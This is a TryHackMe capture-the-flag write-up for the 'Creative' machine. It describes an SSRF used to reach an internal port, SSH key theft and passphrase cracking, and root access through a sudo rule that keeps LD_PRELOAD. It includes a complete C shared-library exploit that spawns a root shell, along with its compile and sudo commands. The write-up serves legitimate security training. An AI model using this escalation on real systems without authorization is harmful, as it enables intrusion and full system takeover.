# Creative Writeup - Tryhackme

*Exploit a vulnerable web application and some misconfigurations to gain root privileges.*

The following is a quick summary of the boot2root machine - 'Creative' created by [ssaadakhtarr](https://tryhackme.com/p/ssaadakhtarr).

## Sections

---

* [└╼ Enumeration](http://redtrib3.me/static/writeups/creative.html#enumeration)
    
* [└╼ Foothold](http://redtrib3.me/static/writeups/creative.html#foothold)
    
* [└╼ Privilege Escalation](http://redtrib3.me/static/writeups/creative.html#privilege-escalation)
    

  

## Introduction

---

The Creative machine was an easy rated machine involving foothold via a simple SSRF to privilege escalation using LD\_PRELOAD shared library manipulation.

## Enumeration

---

### Initial Scan with Nmap

We began by using the Nmap tool to scan the target machine, revealing two open ports: 80 and 22.

### Website Exploration

Port 80 led us to a website hosted at creative.thm. After adding the hostname to our hosts file, we explored the website. However, we found it mainly contained static content with many dead links.

### Directory and Subdomain Bruteforcing

Despite our efforts, traditional directory and subdomain bruteforcing didn't yield much useful information.

### Discovery of 'beta.creative.thm'

Eventually, we discovered an endpoint named 'beta.creative.thm' through further exploration. This endpoint hosted a 'Beta URL Tester' page, which allowed input of URLs to check if they were alive or dead.

### Suspected SSRF

Due to the nature of the 'Beta URL Tester' functionality, we suspected a Server-Side Request Forgery (SSRF) vulnerability.

### Port Scanning with Burp Intruder

To investigate further, we used Burp Intruder for port scanning and identified an open port 1337.

When requesting [http://127.0.0.1:1337/](http://127.0.0.1:1337/) we receive a directory listing, now from here we can enumerate this further for each directory and finally find the .ssh/id\_rsa file in /home/saad .

Now that id\_rsa had a password, use ssh2john to convert to sshng hash format and then crack it using john and rockyou.txt to get the password for id\_rsa and finally login as saad!

```plaintext
$ chmod 600 id_rsa
$ ssh -i id_rsa saad@creative.thm
```

  

## Foothold

---

With access to the system as the user 'saad', we located a bash history file containing Saad's password. Utilizing this password, we examined the sudo privileges using the command 'sudo -l', revealing the following permissions:

```plaintext
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
env_keep+=LD_PRELOAD

User saad mays run the following commands on m4lware:
(root) /usr/bin/ping
```

The permissions indicated a potential Local Dynamic Shared Object (LD\_PRELOAD) privilege escalation vulnerability.

  

## Privilege Escalation

---

Understanding that LD\_PRELOAD and shared libraries can be manipulated to execute arbitrary code with elevated privileges, we crafted an exploit script:

```plaintext
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void _init(){
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
```

Compiling the script as a shared library using the command  
`gcc -fPIC -shared -nostartfiles -o exploit.so exploit.c`,  
we then executed it with root privileges using the following command:

```plaintext
sudo LD_PRELOAD=./exploit.so /usr/bin/ping
```

This allowed us to gain a shell as the root user, granting access to the root.txt file and completing the challenge.

---

*Note: This writeup provides a walkthrough of the 'Creative' machine and was partially summarized using a LLM.*
